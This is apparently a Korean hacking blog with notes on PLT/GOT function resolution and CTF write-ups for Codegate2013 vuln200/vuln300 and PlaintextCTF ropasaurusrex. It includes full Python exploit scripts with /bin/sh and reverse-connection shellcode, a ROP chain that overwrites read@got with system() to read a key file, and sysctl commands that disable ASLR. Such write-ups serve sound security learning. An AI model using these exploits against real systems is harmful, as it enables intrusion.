plt : procedure linkage table
got : global offset table
=====function call=====
1. function call (ex:printf)
2. goto plt
3. jmp *funcaddr(got)
4. in got there is addr for plt's push
5. restart plt
6. _dl_runtime_resolve() call
7. _dl_runtime_resolve() function will call _dl_fixed func and insert real function(printf)'s addr to got
8. real function addr is saved in got and jump to real function addr by got
=====second function call=======
1. function call(ex:printf)
2. goto plt
3. jump *funcaddr(got)
4. jump to function's real addr in got by got
2014년 1월 31일 금요일
2014년 1월 28일 화요일
Codegate2013 vuln 300
vuln300 download
환경 : ubuntu 13.10 / aslr,nx on
환경 : ubuntu 13.10 / aslr,nx on
ida로 분석을 해보았다.
&dest+4+입력값이 복사되는위치인것 같은데, 만약 입력값을 -4로 한다면 &dest+4-4가 되어 &dest의 시작주소에 복사가 될것이다.
또한 저 vuln_function을 호출시 &dest의 주소는 이후 이중포인터로 호출되는데, 그렇다면 쉘코드를 .bss의주소인 0x080491e0에 넣어준다면 될것이다.
#!/usr/bin/python
from struct import *
p=lambda x:pack("<I",x)
s_addr=0x080491e0
shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
payload=""
payload += "-4\n"
payload += p(s_addr+4)
payload += p(s_addr+8)
payload += shellcode
print payload
pwned!!
2014년 1월 26일 일요일
ubuntu 13.10 & etc ASLR disable / 우분투 ASLR 해제
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b72bf000-b73f1000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b73f1000-b75f1000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b75f1000-b75f2000 rw-p 00000000 00:00 0
b75f2000-b77a0000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b77a0000-b77a2000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b77a2000-b77a3000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b77a3000-b77a6000 rw-p 00000000 00:00 0
b77b8000-b77b9000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b77b9000-b77bb000 rw-p 00000000 00:00 0
b77bb000-b77bc000 r-xp 00000000 00:00 0 [vdso]
b77bc000-b77dc000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b77dc000-b77dd000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b77dd000-b77de000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bfef4000-bff15000 rw-p 00000000 00:00 0 [stack]
root@mango-virtual-machine:/proc/sys/kernel#
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b7239000-b736b000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b736b000-b756b000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b756b000-b756c000 rw-p 00000000 00:00 0
b756c000-b771a000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b771a000-b771c000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b771c000-b771d000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b771d000-b7720000 rw-p 00000000 00:00 0
b7732000-b7733000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b7733000-b7735000 rw-p 00000000 00:00 0
b7735000-b7736000 r-xp 00000000 00:00 0 [vdso]
b7736000-b7756000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7756000-b7757000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7757000-b7758000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bfebf000-bfee0000 rw-p 00000000 00:00 0 [stack]
root@mango-virtual-machine:/proc/sys/kernel# sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b7ae1000-b7c13000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b7c13000-b7e13000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b7e13000-b7e14000 rw-p 00000000 00:00 0
b7e14000-b7fc2000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc2000-b7fc4000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc4000-b7fc5000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc5000-b7fc8000 rw-p 00000000 00:00 0
b7fda000-b7fdb000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b7fdb000-b7fdd000 rw-p 00000000 00:00 0
b7fdd000-b7fde000 r-xp 00000000 00:00 0 [vdso]
b7fde000-b7ffe000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7ffe000-b7fff000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7fff000-b8000000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
root@mango-virtual-machine:/proc/sys/kernel#
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b7ae1000-b7c13000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b7c13000-b7e13000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b7e13000-b7e14000 rw-p 00000000 00:00 0
b7e14000-b7fc2000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc2000-b7fc4000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc4000-b7fc5000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc5000-b7fc8000 rw-p 00000000 00:00 0
b7fda000-b7fdb000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b7fdb000-b7fdd000 rw-p 00000000 00:00 0
b7fdd000-b7fde000 r-xp 00000000 00:00 0 [vdso]
b7fde000-b7ffe000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7ffe000-b7fff000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7fff000-b8000000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
cat /proc/self/maps 명령어로 메모리영역을 살펴보았을때 위의 빨간색과,주황색은 ASLR을 disable하기전, 민트색과 보라색은 ASLR을 disable 한 후이다.
ASLR(Address Space Layout Randomization) 을 해제하려면
sysctl -w kernel.randomize_va_space=0
명령어를 이용하여 해제하면 된다.
또한 다시 ASLR을 적용하려면 ,
sysctl -w kernel.randomize_va_space=1 (라이브러리, 스택이 랜덤)
sysctl -w kernel.randomize_va_space=2 (라이브러리, 스택, 힙이 랜덤)
을 하면 된다.
만약 basic bof skill을 익히고 싶다면 aslr과 nx를 해제후 공부하면 되겟고, 메모리보호기법을 우회하는 bof skill을 익히려면 두개다 적용후 공부하면 되겟다.
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b72bf000-b73f1000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b73f1000-b75f1000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b75f1000-b75f2000 rw-p 00000000 00:00 0
b75f2000-b77a0000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b77a0000-b77a2000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b77a2000-b77a3000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b77a3000-b77a6000 rw-p 00000000 00:00 0
b77b8000-b77b9000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b77b9000-b77bb000 rw-p 00000000 00:00 0
b77bb000-b77bc000 r-xp 00000000 00:00 0 [vdso]
b77bc000-b77dc000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b77dc000-b77dd000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b77dd000-b77de000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bfef4000-bff15000 rw-p 00000000 00:00 0 [stack]
root@mango-virtual-machine:/proc/sys/kernel#
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b7239000-b736b000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b736b000-b756b000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b756b000-b756c000 rw-p 00000000 00:00 0
b756c000-b771a000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b771a000-b771c000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b771c000-b771d000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b771d000-b7720000 rw-p 00000000 00:00 0
b7732000-b7733000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b7733000-b7735000 rw-p 00000000 00:00 0
b7735000-b7736000 r-xp 00000000 00:00 0 [vdso]
b7736000-b7756000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7756000-b7757000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7757000-b7758000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bfebf000-bfee0000 rw-p 00000000 00:00 0 [stack]
root@mango-virtual-machine:/proc/sys/kernel# sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b7ae1000-b7c13000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b7c13000-b7e13000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b7e13000-b7e14000 rw-p 00000000 00:00 0
b7e14000-b7fc2000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc2000-b7fc4000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc4000-b7fc5000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc5000-b7fc8000 rw-p 00000000 00:00 0
b7fda000-b7fdb000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b7fdb000-b7fdd000 rw-p 00000000 00:00 0
b7fdd000-b7fde000 r-xp 00000000 00:00 0 [vdso]
b7fde000-b7ffe000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7ffe000-b7fff000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7fff000-b8000000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
root@mango-virtual-machine:/proc/sys/kernel#
root@mango-virtual-machine:/proc/sys/kernel# cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 655385 /bin/cat
08053000-08054000 r--p 0000a000 08:01 655385 /bin/cat
08054000-08055000 rw-p 0000b000 08:01 655385 /bin/cat
08055000-08076000 rw-p 00000000 00:00 0 [heap]
b7ae1000-b7c13000 r--p 00858000 08:01 7674 /usr/lib/locale/locale-archive
b7c13000-b7e13000 r--p 00000000 08:01 7674 /usr/lib/locale/locale-archive
b7e13000-b7e14000 rw-p 00000000 00:00 0
b7e14000-b7fc2000 r-xp 00000000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc2000-b7fc4000 r--p 001ae000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc4000-b7fc5000 rw-p 001b0000 08:01 918455 /lib/i386-linux-gnu/libc-2.17.so
b7fc5000-b7fc8000 rw-p 00000000 00:00 0
b7fda000-b7fdb000 r--p 00855000 08:01 7674 /usr/lib/locale/locale-archive
b7fdb000-b7fdd000 rw-p 00000000 00:00 0
b7fdd000-b7fde000 r-xp 00000000 00:00 0 [vdso]
b7fde000-b7ffe000 r-xp 00000000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7ffe000-b7fff000 r--p 0001f000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
b7fff000-b8000000 rw-p 00020000 08:01 918431 /lib/i386-linux-gnu/ld-2.17.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
cat /proc/self/maps 명령어로 메모리영역을 살펴보았을때 위의 빨간색과,주황색은 ASLR을 disable하기전, 민트색과 보라색은 ASLR을 disable 한 후이다.
ASLR(Address Space Layout Randomization) 을 해제하려면
sysctl -w kernel.randomize_va_space=0
명령어를 이용하여 해제하면 된다.
또한 다시 ASLR을 적용하려면 ,
sysctl -w kernel.randomize_va_space=1 (라이브러리, 스택이 랜덤)
sysctl -w kernel.randomize_va_space=2 (라이브러리, 스택, 힙이 랜덤)
을 하면 된다.
만약 basic bof skill을 익히고 싶다면 aslr과 nx를 해제후 공부하면 되겟고, 메모리보호기법을 우회하는 bof skill을 익히려면 두개다 적용후 공부하면 되겟다.
2014년 1월 25일 토요일
Codegate2013 vuln 200
vuln200 download
환경 : ubuntu 13.10/ aslr,nx on
IDA로 분석중 저렇게 stack overflow가 나는 부분을 발견하였다.
a5는 약 400바이트가 넘어가는 값이다.
dest가 흘러넘치게된다.
환경 : ubuntu 13.10/ aslr,nx on
IDA로 분석중 저렇게 stack overflow가 나는 부분을 발견하였다.
a5는 약 400바이트가 넘어가는 값이다.
dest가 흘러넘치게된다.
#!/usr/bin/python
from socket import *
from struct import *
s=socket(AF_INET,SOCK_STREAM)
s.connect(('127.0.0.1',8888))
p=lambda x:pack("<I",x)
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e" #reverse connection /bin/sh
shellcode += "\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1"
shellcode += "\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50"
shellcode += "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
dummysize=240
custom_stack=0x0804b80
recv_plt=0x08048780
pppr=0x804947d
payload = ""
payload += "\x90"*dummysize
payload += p(recv_plt)
payload += p(pppr)
payload += p(4)
payload += p(custom_stack)
payload += p(len(shellcode))
s.recv(1024)
s.send("write "+payload)
s.recv(1024)
s.send(shellcode)
s.close()
pwned!!
2014년 1월 22일 수요일
Pctf2013 ropasaurusrex (pwn 200)
binary download*aslr,nx : on
*환경 : ubuntu 13.10
xinet을 이용, 7777번 포트에서 동작하게 해놓았다.
우선 바이너리를 다운받아 분석해본결과 read함수에서 overflow가 나는것을 확인하였다.
프로그램 자체는 상당히 간단하였다.
아무거나 출력하면 WIN 을 리턴하는 형식이였다
그리하여 내가 생각한 시나리오는
read@got를 system으로 overwrite시켜서 명령어를 수행하는 방식이였다.
1. read@plt call 로 전달할 명령 .bss나 .data영역에 넣기
2. write@plt call 로 read함수의 주소 출력시키기
3. 소켓이용, read함수 주소 낼름 받아먹기
4. read@plt call 로 read@got overwrite시키기
5. 변조된read@plt call 로 명령 수행하기
그리하여 난 파이썬을 사용하여 exploit코드를 작성하였다.
*환경 : ubuntu 13.10
xinet을 이용, 7777번 포트에서 동작하게 해놓았다.
우선 바이너리를 다운받아 분석해본결과 read함수에서 overflow가 나는것을 확인하였다.
프로그램 자체는 상당히 간단하였다.
아무거나 출력하면 WIN 을 리턴하는 형식이였다
그리하여 내가 생각한 시나리오는
read@got를 system으로 overwrite시켜서 명령어를 수행하는 방식이였다.
1. read@plt call 로 전달할 명령 .bss나 .data영역에 넣기
2. write@plt call 로 read함수의 주소 출력시키기
3. 소켓이용, read함수 주소 낼름 받아먹기
4. read@plt call 로 read@got overwrite시키기
5. 변조된read@plt call 로 명령 수행하기
그리하여 난 파이썬을 사용하여 exploit코드를 작성하였다.
#!/usr/bin/python
from socket import *
from struct import *
s = socket(AF_INET, SOCK_STREAM)
s.connect(('127.0.0.1',7777))
p=lambda x:pack("<I",x)
up=lambda x:unpack("<I",x)[0]
readplt = 0x0804832c
readgot = 0x0804961c
writeplt = 0x0804830c
custom_stack = 0x08049624
pppr = 0x080484b6
offset = 0x9f630
cmd = "/bin/sh"
payload = ""
payload += "A"*140 #dummy 140bytes
payload += p(readplt) #read@plt call
payload += p(pppr) #pop; pop; pop;
payload += p(0) #stdin
payload += p(custom_stack) #custom_stack
payload += p(len(cmd)) #cmd length
payload += p(writeplt) #write@plt call
payload += p(pppr) #pop; pop; pop;
payload += p(1) #stdout
payload += p(readgot) #prints read addr
payload += p(4) #length
payload += p(readplt) #read@plt call
payload += p(pppr) #pop; pop; pop;
payload += p(0) #stdin
payload += p(readgot) #read@got overwrite
payload += p(4) #length
payload += p(readplt) #system
payload += p(0xdeadbeef) #ret
payload += p(custom_stack) #command addr
print "Go Go Go"
s.send(payload+"\n")
s.send(cmd)
read = up(s.recv(4))
print "this is read : "+hex(read)
system=read-offset
print "this is system : "+hex(system)
s.send(p(system))
print "\n!pwned!"
s.send("cat /home/mango/key\n")
print s.recv(1024)
s.close()
PWNED!!
피드 구독하기:
글 (Atom)